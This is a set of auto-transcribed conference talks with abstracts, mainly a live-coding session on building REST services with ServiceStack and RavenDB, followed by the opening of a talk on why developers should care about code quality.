stuff, msdn.com, slash Roslin, for Roslin everything is there, documentation, download, everything is there. MaceSaint.com is the guy who wrote Elastic Object. He is a super smart guy, so just go and look at this blog and get your mind blown. Yeah. That's it. So if you have any more questions, just come to me afterwards. Find me in the conference. Send me an email, tweet me, I don't know, something like that. I will be glad to help. I hope you have a good day today. Thank you very much for being here. Thank you.
|
.NET 4 has brought us the DLR and C# 4 has brought us the dynamic keyword. With their powers combined, C# suddenly gets super powers! In this session Shay Friedman will show you surprising and practical things you can do with C#, the dynamic keyword, the DLR and IronRuby!
|
10.5446/50990 (DOI)
|
So, can anyone hear me? Yep. It's nice to see that more than two people turned up, so it's going to be fun. I'm here to talk about Service Stack and how many have heard about Service Stack or used Service Stack? So, around five or six people. That's great. I'm mostly doing this to inspire people and say there's other stuff than Web API or Nancy or whatever you want to use. So feel free to leave if you don't want to be inspired. Why I'm here? As you can see, I'm a developer at a company called Atia in Denmark and I'm pretty sure some of the Norwegian guys have heard about Atia, but it's an IT infrastructure and we're like four or five developers out of 1500 workers, so it's fun. I've done.NET development since 2002 and I think it was probably.NET 1 back then and did Silverlight last year with a lot of web services and as you can see, I kind of got caught in a discussion on Twitter around November. I might have made a mistake by saying that I didn't mind WCF. It was great. I had no problems with it. That pretty much went right back in my face later on. And I got annoyed by the RPC style you tend to do in WCF. And I assume you're all nerds, so you're probably going to like being here. It doesn't matter what you use or who you are. It's going to be fun. So what are the bad ideas for doing web services? If we look at the code generation, how many people have tried a WCF service adding it as a reference and the code just doesn't work? You get an external tool error, something, something, around half of you. And did it tell you how to solve it? No, absolutely not. And what happens when you change the service and update the reference, check in the code? What happens when the other developer actually did another method as well? Just blows right in your face and you have merge conflicts all over. That's some of the fun stuff. And then we have the archaic XML configuration. I think everybody can agree on that we should kill XML configurations as much as possible now. Yeah, as I said before with the mergers, I've actually seen a guy by mistake pushing stuff to a production server and it almost killed all the data in the server. So that was no fun. And then we have defaults. How many have been fighting defaults in WCF? Max objects and graph? Does it sound familiar? Or timeouts? And why do we have to go and set values? Why not use reasonable defaults? It's taken directly from Demi Bellard's words, the guy who primarily do all the coding on service stack, but have reasonable defaults. There's no need for us to go into these default configurations and overrides and so on. They should just be working. Fixed serialization. I haven't dug really deep into WCF if I could publish two serializations on the same endpoint, but wouldn't it be nice just to say, I want this to run JSON and by the way, if you can handle my XML and some other formats as well, that would be great. It would be awesome. I don't need to do new stuff if we get new developers. And the RPC style, it's a maintenance hell, as I said. And we have chatty services. It's not really a bad thing about WCF or any other framework. We should be bulking stuff instead of just pushing small method calls all the time. So that's some of the bad stuff. And as you can see, you've been burned before. Don't do it again. So what is this weird service stack thing? The official subtitle is, WebServices done right. Rest services done easy. Yeah, I remember that correctly. I'm not going to go into this huge rest debate today, hopefully not. But it's really, really easy to get up and running and do some rest services if you want. I'm going to show you how to later. Simple and model driven. If we put our models in a separate assembly, we can pretty much share it on the server and the client. We've done that in WCF as well. But this is the primary focus of service stack. Let's start with the model. Don't start off by generating weird stuff on the client side. End point ignorant. I was talking about these civilizations. You can pretty much get any format you like in service stack. It's IOC based. Everything should be IOC based these days. Easy access to HTTP. I'm going to share later on where we can pretty much just push HTTP codes or get stuff from the request and so on. It's in the box. Fast as lightning. I don't know if anybody heard about the Jason serializer from service stack. Yeah, a few of you have. At the moment, it's the fastest one. I'm going to come back with a graph later on so you can see the stats. It's amazing how fast it is. And I saw a guy called Mike Strobel the other night. He was tweeting to Demi Bill at about, I think I found a way to increase the speed by 25 to 33%. When you're the fastest and you're like somewhere between six and 30 times faster than the other ones, it's pretty impressive to find another 25%. Cross platform. Anybody running mono in here? A few guys. Awesome. You're going to like this. Oh, yeah, the clients are in the box. We don't generate any clients on the client side. We just use what's in service stack and use ways to grab data in that way. Yep. What's in the box? If you get the Nougat package called service stack, you're going to get the service stack text. You're going to get the common. That's pretty much what you need if you run on the client. And then you get the Redis and in a micro or M called or M light. That's in the box. I would have preferred this one. I don't see why I should get Redis and SQL light or the or M light into the default configuration. I really have no need for it. And it's just a pain to have assembly. You don't need. And then we're going to look at some code. That's going to be a lot of code. I hope you'll stay awake for it. And I'm probably going to do a lot of mistakes so you can point and laugh at me. Yep. We're going to start off by the eye service. Eye service is the basis of the service running in service stack. You can do your services directly from eye service. It's not recommended, but you can do it. If you go for the service basis that they've done some error handling for you, like wrapping it and putting it in a nice way and sending the right error codes from time to time. And you have the rest service base. It's pretty much which flavor do you like. Are you going to go for the single execute method or are you going to go for the rest way? And you can do other stuff as well. Yeah. And well, just in case you didn't notice, you can cut off an arm. It's really easy to do. But if you like your teddy bear like that, you can do it. But now let's look at some code. It's way more fun. I'm pretty sure. So I have my great solution here and I added some references. There's a lot of Winchester stuff and RavenDB, not important. But I pulled in service stack. And as you can see, it just pulled in the rest of it. That's actually quite easy to get going. As far as I remember, if you do it in an MBC project, it's going to set up some of the stuff I'm going to set up now automatically. But I decided to go on my own. So here we go. First of all, we need to register the correct handlers. As you can see, I have a location called API. And that's pretty much going to be a subfolder where I'm going to host my API. If you run the MBC project, it automatically puts it at an API. So I'm just going to create that, taking the slow road. So now we have the API folder. And that one should just go away. And then I have some stuff in my global ASACs. I'm going to come back in a minute when I've done the API host. You pretty much set up an app host space, as far as I remember, to run all this stuff in. You can hook up different stuff inside the app host. But just to tell you a short story, I've added some drinks to my RavenDB. I'm pretty sure everybody had a drink or two during the week. And what an obvious topic for the last session on a Friday. So it's going to push some drinks into my RavenDB. And then we'll be able to make some drink cards later on. Pretty much have a drink card with the name and type of drinks or the drinks. And then you'll find out if it's an evening card, noon card, or whatever it is. And there's a small trick you can do in Service Stack. How many know about the mini-profiler, Sam Saffron, and some other guy did? Or any other profiler you can run just pushing it? Or is it Glimpse, the other one? I think so. Well, support for mini-profiler, let's build in. Let's just leverage that. And then I have my API host. And then I'm going to push in an app host base. That's quite easy, but I get some stuff I don't want. That's a bit too much. Let's see. I have a... Where did that go? Yeah, in case you use another IOC, then the funk one that's built into Service Stack, you give it an adapter. So pretty much I'm getting my Windsor adapter. I have somewhere else. And I'm just going to say it was a container adapter, as far as I remember. Yep, and as I said, a lot of misspelling. Then we'll supply a service name. Could be drain... NDC, drink cart service. And then I have once an assembly as well. API host assembly. And then we want to do some configuration. That was pretty much most of the setup we need to do. But since I decided to put stuff in a subfolder, I need to do some set config as well. And I'm probably going to do this wrong. Let's see if I can remember which one it is. So much stuff to remember on this. So pretty much what I've done here is just set to a service stack host that I'm actually not hosting in the root directory. I'm hosted in the API folder. So the handle is set up for the API folder and service stack is now set for API folder as well. And that's pretty much it, except that it's not much fun doing web services without a service. So we're going to create a basic service as well. Let's see. We're going to create a drink service. Here we are. I could go for the iService if I wanted to. It would look like that. And I could say drink. Then I will get this. That's all nice. And I've actually got some services I need to refactor because I did the iService before actually read on upon the stuff, but legacy stuff, running in my private stuff so it doesn't really matter. If I wanted to expand this, I could actually do it. If I just wanted to support the get keyword from REST, I could just add a partial interface for it. Now what would happen if I call the service, if I did a post or anything like it, it would actually go for the execute method. If I do a get, it hits the get method. So you can actually have different flows in your service. That's pretty cool, but I'm not going to use this. This is just way too hard and I need to do error handling and so on. So we're going to delete that. And that's more fun. And you might have noticed that this time it's a run instead of an execute. Somehow I'm a bit split. It could have been the same. Just would have been easier to change it. But well, who cares? Now if I want to request a single drink, I could just do request drink ID. That was different from my GUI.empty. Then I could just, oh yeah, I know what I need. I'm running a RavenDB so I might want to get hold of my document session. And if somebody looks at my code later on and you see the registration for RavenDB, yes, it is wrong. I have the wrong lifestyles. So I just want to grab that single drink. So we'll do a drink. It's pretty easy. And then I can just return that drink if I want to. Usually, you end up having a drink response. Because wouldn't it be nice to just get the same response and if I get one in this list, well, I have one drink. If I have many, I have many. It's just easier to pack stuff up and do batch loading. So I'm going to return a new drink response. Yeah, like this. Go away. So now we have actually done our first service, but we kind of want an option to get all the drinks as well. So we're going to just add drinks. It's fun looking at me writing queries to RavenDB, right? And misspelling. So, a new drink response. So that was pretty much it for our service. As you can see, it's pretty easy to do a web service and service stack. It doesn't really require much code of you, and that's pretty much it. One thing you need to do before you get it up and running, you need to add a route as well or route or however you want to say it today. And that is most often for me done in the app host base. You can decorate your DTOs, but I don't like decorating my DTOs for service stack when they're in a different assembly. That just seems so wrong for me, and somehow I don't like putting attributes everywhere. So I'm going to add a drink, and that would be most likely be drinks. So now we could get the drinks, but we kind of wanted the option to get a drink, a single drink as well. So we're going to add another one, and we can do drinks, and hit something wrong. And do the ID. Does that seem familiar when we're talking about RESTs? I hope so. And hopefully everything builds and runs. Yep, it's succeeded. That's fun. One of the awesome things about service stack is that it's actually quite intelligent, because it's going to look at my code now and generate a meta page for me at some point if I did it right. Oh, yeah. It doesn't matter how many app hosts you do if you don't actually start it up. Minor defect. Yep. So now we should have a service. Except I come to stuff out in my installer as well. Now this is fun. How many did come to see me fail? Awesome. A few guys. At least you're awake. I'm going to put my container. I'm going to eat the service. Sorry for that. We ever got the ES blown out. Those familiar with Castle Winter would notice that I'm just pulling a lot of stuff in everything that matches and I service will get into this and spun up. So that's quite nice. And it should be able to run now. Anybody else have a laptop without an SSD? This is quite nice page we got from service stack. We can actually see we have operations on drinks. And we can actually look at the bottom and see in case we want to hand this off to someone else and they don't want to use service stack, we can supply them with SSDs and whistles. It's quite easy. I actually tried it the other night. I don't know why but I did. And then we have the options of the different formances up here. So here you can see pretty much I registered for all works on drinks and drinks ID. And you pretty much have a small example on how am I going to use this. But there's another cool thing about it. What if I try to go for that URL? Awesome. I have an empty database for some odd reason. That's weird. I should have some stuff. Let's just take a peek at this. If anybody spots my mistake please say so. I would guess that I needed to do this to a list because I'm pretty sure that Revenby doesn't like this. Or service stack doesn't like this. We'll see some drinks. Nope. Drinks are gone. My if condition? Is it the other way around? No, I don't want to hit that one. I pretty much want this. And this one. I'm actually doing the regular get. So I just want to get all the drinks. I didn't supply an ID. This was fun. Why did I decide to go for live coding? Ah, no drinks. Oh, I didn't do the app start because I didn't restart my application. I decided to go and clear my complete Revenby database before I went in here. So all the stuff being run from the server, it's pretty much not being run. Let's move this. And we should be able to season drinks, hopefully. Nope. Who ate my drinks? Pretty sure that I added some drinks. Hmm. This is going to be fun showing off drinks when I have none. Let's see. Yeah, created my Revenby. Should be okay. Let's see. Now, isn't it fun looking at people messing up? Give me a break. Yeah, yeah, I know. So let's see if we're lucky this time. We see a button in the database. That's a good start. That's actually quite a good question. Hmm. I'm pretty sure it wasn't this way last night. Let's see. So this is how to completely fail your demo. Anybody remember if you can actually do breakpoints in global ASX? Or did I just change the run code last night? We might have done. I think I know why. So pretty much it should insert some drinks now. Nope. So who killed my code last night? Is this in store? So can anybody see any Revenby errors? What? Clever man. I talked to the Revenby guys the other night and they pretty much convinced me that I should stop using repositories. So this is what happens when you throw away your repositories. So, well spotted. I'm not just nerve-wracking anymore. We might have drinks in a moment. I just killed it. It should be there now. Yep, there it is. Just going to remove that and that. And we are going to get... Yay! Drinks for everyone. So just to make sure that we could actually get a single drink. I'm just going to paste that so it's as easy as that. But that was drinks we were meant to do like a drink card. And that should be fairly easy to do. Since I'm a really lazy bastard, I'm going to take full advantage of using resharper. And I'm going to do a wrist service base and drink card. So that's fun. If you get ticks from me tapping around, just raise your hand. So, I only want to handle on git in the first run. I might want to do some put as well. It's going to be hard to get new cards into the system. Post. This is pretty much what we need to do. As you can see, I don't have to set up all the different types of keywords or verbs. I can just go along as I need to. I could have done it the other way around as well with the eye service and just adding these separate words. There's a lot of options and do whatever fits. If we get a request with an ID, it's always nice doing ID stuff. Go to empty. Then I would like to get a drink card. Somehow I have a tendency of missing Raven the Beast off today. It's funny listening to me when I'm silent. Just going to return the drink card. That's fine. We want to just grab all drinks, cards, not crats. Excuse me for my ADD. I can't do misspelled stuff and just doesn't work for me. What the hell am I misspelling? What? Oh, in. I wouldn't think that you would remember that. Card. Select DC. It's nice to have people correcting me. Come on. Be nice. Memorized clone. Why would I do that? So everybody's heavy. We got drink cards as well. It's not going to be much fun if we don't add them. We're just going to grab and say decision store. I'm pretty sure if I've done my fallback to my demo I had in my repo, it would have been failing in the same places. I could say return new HTTP request results. I want to try that. I can pretty much do like this and wrap it inside an HTTP result. But if I wanted to give it a specific HTTP code, I could do that as well. How is it? Status code. And I could say create it. That's some of the options. But the client on the other side would actually accept this and just say, oh, you just send me some extra stuff and I'm just going to grab the drink cards or the single drink card I got. So that's pretty much what we need to run our drink service. And we need to, of course, add the routes as well. So if we go to the card. I wish we pretty much have everything. And as we will see, it should just add another option to our major page in a moment. And all of a sudden we got drink cards as well. And if you look in the output you would see somewhere up here. I think I forgot to add the log manager. But actually when it starts hooking up the services you would get a log entry saying, I just registered this service. So you can actually just see that it does it correctly. And of course we can do stuff like drink cards. And nothing comes, of course. As you see, the profile is running in the upper right corner. It's nice to have. I'm just going to add a logger. So log manager. It tends to be a bit confusing when you have two classes being the same thing. I don't know how many times I've been adding the in-log instead of the actual service stack log manager. And I could say, Nero, do I have an in-log? Yeah, no, that's the wrong one. I knew it in-log factory. It's nice and confusing to have several stuff. Really? No. Stop doing this to me. Did I lose my logging? Yeah, so apparently I forgot to pull my service stack in-log. Oh well, who needs logging anyways? So we could have had logging. So I hope you're okay without logging. And if we wanted to use this great API we just did for drinks, I made a small really, really stupid console app. Somehow everything should be in the terminal these days, so why not do a drink cart manager in the terminal as well? And as you can see, I'm setting up the URL for it. That's quite simple. Of course, we need to know where our API is. And then you just can do a JSON service client. If I go fastly to my slide. Yep, let's see here. So you have all sorts of clients. You have the service client and you have the rest client and the rest async client. Of course, it doesn't really make sense to push the rest clients on the service client, but you can have a service client, rest client, and rest client async for the rest of the stuff. And as I said before, you can actually do the whistle way if you want to do it. We'll just go through this again. The first thing I want to do is of course grab all my drinks. How much fun is it creating a drink cart if you don't know what the drinks are? So I pretty much grabbed the list and I'll put it later on. So this is just like basic crotch stuff, adding things. And in the end, we're going to do a post to our drink cart service and just say, hey, here's some drink carts. Have fun. Get drunk. And I'm just going to run this and create a short small drink cart. Oh, Jesus Christ. Somehow I managed to remember my fun sizes and so on, but not in a nice way for you. So new cart. It's always nice to have new cart somewhere. And it's the afternoon, right? Or are we going for evening? So we have the list of drinks. We can see that pulled the drinks directly from the service. We might want a white Russian. We want a Long Island IST in Manhattan. And somehow that didn't work. We were supposed to see the right results, but the quick reader might notice that I actually did this wrong because I just returned the drink cart. I didn't wrap it inside my drink cart response. So actually I'm a bitch stuck right now and I need to add my drink cart response, which should be fairly fast to do. Cards. The way service stack handles this when it gets to the response, I say I'm saying like, if you look at this right here, I expected a drink cart response. It will actually try to serialize the response into the drink cart response. But if you try to use it, you would get an awful exception with like, ah, I can't deserialize this. It seems wrong. It's just weird. But it doesn't really just flip upside down and pukes all over the place. It didn't have that many drinks. Yeah, I don't care about the type. How many is annoyed by the automatic typing stuff? And we need to do this as well. Cards, new. Ah, both of them. What am I missing? Ah, yeah. There we are. Yeah, have fun with all the curly braces. Let me just check everything works. As you can see again, it's great not having an SSD. So we actually did put the cart into the stomach of the RavenDB, and we would have gotten this back again, and I could have shown you the JSON. I'm not going to create another one, just, it's just lame doing another one right now. Then we have a lot of extension points for service stack, which is actually quite fun. I talked about the logging. You pretty much set the log factory on it, and how fun wouldn't it be if we could like, do our own custom format? I have prepared a small custom format. If you want your own content type, why don't just do an x-drink card and say it's text. I added the serialize to stream, but I kind of skipped the deserialize, because I don't really care about deserializing these. Yeah. Now you're reusing the types on the server and the file. Yep. Do you have to do that? I would recommend that you reuse your types, because it's just easier to maintain the types. There's no need to have other types, but you could have other types on the client, as long as they serialize to something it matches in the other end. It's possible. You could send raw JSON as well if you want. I just like working with objects. We have a custom serializer here, and the way you could add it was like this. You can see the drink card formator. What you can see is it's going to show up with another drink, another formator in this list as well. It's actually quite nice that it looks at which formators do I have, and here are the options. As you can see in the middle, right here, we have the drink card now. It's quite fancy. We could actually use it right away. If you want to see it drink card formatted in a really weird way. Yes, I accepted. This is our custom formatting. It's really that easy. Just go along, do your own business. That was one of the fun parts doing. What if I wanted to remove some stuff? I could actually do that as well. Let's see. Pretty sure I'm grabbing the wrong thing here. Yes, I thought so. Wrong place. Enable features. They were so nice that they actually added features all. When you want to remove stuff, you go features all, and you pretty much just say that you want to remove a single thing. That could be like whatever. We could remove the XML. If you're really quick, you could notice that it supports protocol buffers as well. How many have ever heard about protocol buffers? Nice. It's a way, as far as I remember, it's optimizing the payload you send over the wire. It's awesome if you need really, really small segments or a lot of compressed data. Now we should see XML disappearing. Hopefully. Maybe. Come on. Faster. Magic. Yay. That wasn't a good demo. Ah, CSV. Not XML. Notice if CSV was gone. Ah, this, yeah. I don't know who uses CSV for serializing. It seems weird. We could do request filtering as well if we wanted to do statistics on our website. We have the option of going to request filters and say just saying add, and we could do requests, response. And then we just go along and do whatever we wanted to do, because we have access directly to the, we could like track the user agent. We just grab it right off every request and we can do it the same on the response as well. So there's a lot of hook points and you can actually just do whatever you like. So it's nice that it's just plain simple when it comes out of the box, but if you really want to do wicked stuff, you could just go do it. I don't know if wicked is the right term to use, but that's how it is right now. And then I have some more fantastic slides. So we talked about the clients and you can pretty much switch to another client if you just wanted to serialize the other way. You don't have to do anything on the server. If I wanted to change my JSON service client, I could just do it and say, I want the GSV service client. So that's pretty nice that I can just switch to whatever client I like. I think it's pretty handy from time to time. And then it's a freaking Swiss Army knife. And why is it a Swiss Army knife? Well, we have a lot of options. Hmm, I think that's a bit like long list of SQL service supported, but it's really, really nice that you can just grab another NuGet package and you have it in the box. So it supports all these. And if you want authentication besides the built-in ones, the built-in ones are, as far as I remember, basic and some other authorization stuff. And they have Twitter and Facebook authentication. Why would I need that on my web services? I don't get it. If somebody knows why, please come and tell me afterwards. And I think it was Monday or last week, they added the N-hybernate to the authentication plan. And if you want to do caching in the box comes, of course, the RITIS. And it has memory client, file client, file and XML disk written client, whoever wants to use disk cache. Or you can just grab Azure or memcached. And of course, protocol officers support it. It was in the list of options, but it's an add-on you grab on later. And of course, it supports logging. My favorite is N-Log, but if you want to run Log for NET, and yes, it does exist in a strong signed and a non-strong signed for those who cares. And you have Elma and EventLog, of course. Yay, you can sleep in it and you can eat it. And of course, as I said, if you have the need for speed, this is going to be awesome. If we take a short look, we see Jason.net here. He actually did a complete performance release, but apparently he didn't beat him. And way over here, we have service stack doing this text. And if you look at it, going from JROC or JavaScript serializer to this, that's going to do a really, really huge impact on your serialization. And imagine if they can cut even 25% more of it. That's going to be awesome. And it's cross-platform. There was a few Linux guys or Mac or whatever you're doing. It supports asp.net, HTTP listener-based. And as you can see, if you have a really, really old server, that's not a problem. Just third-eyed. I was running the demos of my IIS Express. And in my production code, I actually have a Windows service hosting my API. So there's a lot of options if you need it. And that's all the... I was about to say weird Linux and OSX stuff, but I might sound wrong. But if anybody knows about this stuff, I'm pretty sure you would not and say, this is okay, this works, this is what we're doing. And there's a small surprise in the end, because how many would like to see service stack running on an IOS device? They actually did a demo where they ran Monotouch. I don't know why on Earth I would host web services inside an IOS app, but apparently somebody liked it. So we can fly. Yay! Where can you find more stuff about this? If you go to the source, you can grab whatever you need. It's right there on GitHub. And you can find a lot of help in the Vika pages. And you have a docs section as well. It's a bit split. I think the Vika pages are more up-to-date than the docs pages. And the docs pages are mostly about extension points or other plugins they have. And then we start wondering, would we actually use service stack in the production environment? As I've already said, I'm running it as a Windows service. And it's going to be quite good. We're going to do a production release by the end of this month. And it's not like some kid in Texas just sitting along, drinking Coke, having a pizza and just doing some random stuff. It's actually quite old. As you can see, the first commit was done in 2008. So it's not a new product. It's actually quite old. The first version didn't look like it at all. And in case you didn't read it yet, yes, DemiBillard works for Stack Exchange. I'm pretty sure he's a valid guy for this stuff. If you don't trust him, I'm willing to send him an email saying people don't trust him. And it's quite well maintained. Actually, when I did my code last week, I was running 3.7.9 or something like that. And I did the, you're about to fail speaker because I updated my assemblies this morning. And as you can see, there's coming a lot of commits and it's really nice. There's always a new commit. And that was pretty much everything I have to tell you today. If anybody has questions, I'll try to answer them the best I can. Also, I'll let you leave early for your flight or your train or your car or drinks or whatever you like to do. And I would like to give a shout out to the Code 52 guys. You should check out the projects. It's a fun place. A lot of new stuff going on. Anybody have any questions? None? It does support all weird kinds of authentication if you want to dig into that at some point. You have a question? Awesome. How does it handle SSL yet or no? The question is if it handles SSL yet. It was actually one of the first things I started looking at and it turns out a bit weird. It's not in a box story because you need to do some registrations because it doesn't really handle SSL. You do a lot of wicked, nasty command line tools and whoopty. You have SSL support. It is supported. You can do it. But it's actually not something in service that handles it. Anybody else? I think we'll say that's it. Thank you for coming. It's quite nice to see so many people showing up even though it's the last session of the day. Thank you very much for coming. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you. Thank you.
|
Getting tired of adding services via “Add service reference”? Annoyed by the fact that the configurations are so hidden and easy to forget? Wish you could be a little bit more in control of your service channels? Now there is the option to have it all solved, enter Service Stack, giving you the power back but doesn’t set you back to the days of the *.asmx. With Service Stack you get the power of controlling what should be flowing in your application, e.g. no more boxing to ObservableCollection just to push data over the web. This session will show you how easy it can be to regain power of your networking layer, and how little code it actually requires. With Service Stack you don’t actually have to spend much time worrying if you need to support other serializers, most frequent used are in the box. Last but not least, how easy RESTfull services can be.
|
10.5446/50994 (DOI)
|
All right. Let's get started. Welcome to the session on caring about code quality. My name is Venkat Subramaniam. We're going to talk about something that we as programmers are very passionate about. If you have attended some of my previous talks, I have to apologize. This one has no code at all. The other one's had no slide at all. So sorry for that. But I hope we can still have a good conversation and talk about quite a few things here in terms of code quality. So best time to ask a question or make a comment is when you have it. Please do ask questions, make comments. I definitely love to hear from you what you have in mind. So don't hesitate. It's not an interruption at all if you want to just step in and talk. Raise your hand. But if I don't respond to you, that usually means that I'm not paying attention to where you are. But just start speaking something or make a noise and as soon as you draw my attention, I'll yield to you and respond to your question or comment. So let's get started. First question, of course, always, I'm a why kind of a guy. I always ask why. Why should I do it? So my first question, of course, in this context is why do I care about code quality? Why should I care about quality of code when my intent is to write code and get code working? And the reason simply is this. You cannot, we cannot be agile if our code sucks. Now imagine for a minute, you are on a project and your company says we are agile and the customers are like really what does that mean? And your company says that means you guys tell us what you like and we will respond to your change. And the customers are like that's kind of nice. Can you change these things? And your company says sure we are agile, why not? And you're sitting in that meeting and as the guys are talking about it, you realize to make that change that they are talking about, you got to touch that code, you know, the one I'm talking about. And the code that you touched last time and you could not go home for the weekend. And now you're going to convince them this is not a good change to have, right? So in other words, if you cannot really have a good quality of code, it's extremely hard to be agile where agile is to respond to change based on feedback we receive. And that's one of the reasons why we should care about code quality. So what is quality of code? Why should we really care about it in that regard? And to me, code quality is really boiling down to this wonderful quote. Programs must be written for people to read and only incidentally for machines to execute. We spend so much effort writing code. We don't often think about reading code, but programs are for human beings to be able to understand. And what do we normally do when we speak to each other? We communicate. And there are different ways to communicate. One way is verbally we can communicate with each other, but your code is a way that you communicate with your fellow developers in the company. And so it's important for them to be able to understand the code and to be able to maintain the code that becomes extremely important and useful for us to think about. So from the point of view of that, it's important for programs to be written by people so it can be read by people more than executed by the compiler or the computer itself. That's very important. Now, having said that, one of the reasons why we have to make sure the code is of good quality is, unfortunately, software is never written once. If somebody tells you they designed the software and wrote it and they never changed it after that, they are telling you the project got canceled, right? Because any useful software has to evolve has to change. And the amount of change a software has to go through depends on the number of features we are trying to support. And more that is, it's got to change. And as a result, we have to support this change. That's very important. And one of the problems with software is the cost of fixing a defect increases the more time goes between writing the code and finding the problem. If you write code and within seconds you say, darn it, that's stupid, I shouldn't do it, duh. And then you go back and fix it, that only cost a little bit of money. But if you find it next day and fix it, that cost a little bit more money. What if you find the problem in two months after you wrote the code? If you are like me, after two weeks, I can't even recognize my own code. I look at this and say, did I write this? So it takes more time for you to gain the context on the code and go back to fix it and it becomes more expensive. And the worst thing is you got to look at a code written a few years ago by somebody else who no longer works in the company. That's the worst kind of job to be in. And you are really looking at this code and trying to understand it becomes very expensive. So how can we reduce the cost of developing software and handling defects? And Bohm talks about this in one of the good papers and they say that finding and fixing problems in production code is 100 times more expensive than finding and fixing problems during development. So we want to be able to get to this really quickly during development and not really wait until production time for this to find. And it says 40 to 50% of effort on projects is avoidable rework. So we do so much that can be avoided and we don't have to waste our money and time doing this. And they talk about 80% of avoidable rework comes from 20% of defects and they talk about the 80% of defects comes from 20% of modules. So this is really encouraging news because we can contain the area and really solve the problem. And it says 90% of downtime comes from mostly 10% of defects which are really critical on projects. They go on to say one of the best ways to really improve software and reduce cost is to have peer reviews because peer reviews catch 60% of defects. And I cannot overemphasize this. This has been around for a long time but one of the practices that is not as much used in our industry because most of us don't like to do this for various reasons. But if there is a way we can have code reviews and peer reviews on projects, it can reduce the cost. I will come back and talk about this definitely more because this is such an important topic to spend time on. But it's not just a code review and I am very adamant about this. The worst code review you can have is where you have architects and senior developers reviewing code that other people write. There is a name for this. It's called the priesthood based code review where you bring in people with beard and they think they are great programmers and they sit there and say how your code sucks. This is absolutely useless. So what you really want is a perspective based peer review. The people reviewing the code should be the people writing the code itself. Not some architect somewhere who doesn't write code anymore but is really important for them to review the code somehow and tell you whether your code sucks or can be better. So it's important for a peer based review. Like I said I will come back and talk about this more later on. But then they go on to say that discipline to personal practices can reduce defect introduction rate by 75%. Now this sentence is loaded with several important things here. The first important here is discipline. This is one of the most difficult things for us in developing software is to really have discipline. It's easy for us to acquire a lot of practices. One of the reasons I cringe the word agile development today is if you look at most companies and look at what are they spending their time and money on. They want agile development. They want training related to agile development. You go to them and they say can we have scrum certification please. Can we have stand up meeting please. Why? Because standing up is so easy especially if you can lean on a chair. Right. I don't want stand up meetings in my team. Who cares about stand up meetings. Tell me what you're going to do to really effect change in building software. And guess what. That takes effort. That takes discipline. So most companies do what I call as agile by convenience. So they want to pick and choose real practices that are so darn simple and easy to use so they can just apply those and the real hard stuff. Let's not worry about it. That's not for us. Right. So I don't want agile by convenience. I want agile by dedication and discipline. Let's do the real hard stuff and make the software better and serve the needs of the customers. So discipline is extremely important in this regard. And personal discipline on projects is very important. And that means you don't say I would do all this if only my company allowed me to do that is utter nonsense. If we believe in doing things that's at a personal level then we propagate that to the team and make everybody else follow that. So personal discipline is extremely important. And if we can use some of the personal discipline practices it doesn't eliminate defect. It eliminates the introduction of defect in software which is a lot better than removing defects because you don't want to put in and then remove it. So that is one thing to think about. The other thing they talk about is it costs 50% more for source instruction to develop high dependability software products. In other words if you want to build the quality software it is going to cost you money. It is not free. It is not going to be something you can just kind of do along the way. It is going to take money and effort. Now to really expand on this one of the companies which is my client they called me up a few years ago back in 2007 timeframe and they said we have problems with quality. Could you please come and do some courses related to quality and improve quality on our product. I went and offered the scores in one of their locations and two weeks later I was going to go to their another location and teach the same course and then go and teach the same course in several of their locations. So when I finished the first scores at one of their locations one of the developers came to me and said hey Venkat we have known you for several years. You come here and give us all these nice talks. We get really excited about what we hear. We talk about the course. We talk about what you said for about two weeks and then afterwards it is business as usual. So tell us why this time it is different. And I swiftly answered him saying that your problem not mine. I just came here to teach and I kind of walked away. Two weeks later I went to their another location. The guy who hired me was there. He said oh by the way I heard that there was a question posed to you. I said here was the question they asked me and he said what was your answer. I said that I said it's your problem not mine. And he said well okay do you have the same answer now or do you have a different answer. I said I have a different answer now because that was a spontaneous answer but I've had two weeks to think about it. He said what is your answer. And I said he is absolutely correct. My time and effort here is completely wasted and your money is completely wasted. If you guys going to just listen and walk away. He said okay what should I do. I said the first thing you do is for every software project in your company where quality is important. Find one person in the team not a manager but a technical person and make that person the champion on the project for quality. That champion on the team is responsible to first define how he or she is going to make the team improve quality in three months in six months and nine months and in a year. And this becomes the responsibility of this quality champion in your team to do this. This was in 2007 by the way and it's been about five years and that's exactly what they have done. He's identified quality champions on teams and they have done very dedicated effort in building quality software in measurable levels. So in other words if you are serious about quality don't talk about it. Do it. Have somebody whose responsibility is to improve quality and they have to really work on it and show the results in a three month period, six months period, nine months period and a year and say here is how we have improved it and here is the plan for the next three months moving forward. So it is really something we have to really work towards to improving the quality of software. But still the evidence is overwhelmingly clear. But one thing I noticed I'm sure you share the feeling with me is that companies never have time to do it. But they always have time to redo it. This is kind of funny isn't it? Because you go to the company and say hey we need to do this the right way. Can I do it? No we don't have time for it. Then we create a big mess as programmers and the company comes running behind us and saying could you please fix it now? So they never have the money and the time to do it but they always somehow have the time and money to redo it and that is kind of a reactive behavior that we have imbibed in our culture as organizations developing software we need to break out of that cycle very clearly. That's very important. So one of the things to think about is to pay the technical debt. So if you are on an agile project and if you are scheduling your project iteration or a sprint I will first ask you how much time are you dedicating in every sprint or every iteration to really address the technical debt. Do you know what your technical debt is? That is something to think about. So if you don't know what your technical debt is or even if you do know what your technical debt is but if you're not giving enough time to really solve the technical debt this is eventually going to blow up because the way the technical debt works is very similar to financial debt. So I have a credit card. I go around charge this credit card along the way and as I keep charging the credit card at the end of the month the credit card company sends me a bill. I'm sure nobody here likes to receive that bill right and the bill arrives in the mail and you look at that and say it says you owe this money and I tell myself you know what I'm getting the salary but I've got so many useful things to buy. Why would I want to waste that money paying for this stupid credit card? So I'm going to send a minimum balance and continue to spend and a year goes by and I've reached my credit limit. What does the bank do? Remember the bank cares about me right? So the bank sends me a letter saying dear valued customer you exceeded the credit limit so we have extended it. So they increase it by tenfold because the bank cares about me so much they never want me to get in trouble they want me to get into real trouble. That's part of the financial world right where things are. So I keep spending more and spending more and spending more and one day I realize the money I owe to the credit card company is several orders more than my salary per year. The only options I can think of is to grow a beer change my name and move to a foreign country. I have no such intention during this trip just to be clear right? And the point really is you have to have the discipline to manage your budget and pay things along the way and really a technical debt is exactly the same and if we don't pay technical debt eventually the project will have to declare bankruptcy. Now I'll tell you about something that I learned the hard way. I was in college and I'm sure you know all of you going through college did exactly the same thing right? Please do say yes otherwise I feel bad about it. So when I lived in the college I used to rent apartments and in my apartment I would never clean my apartment. We would completely 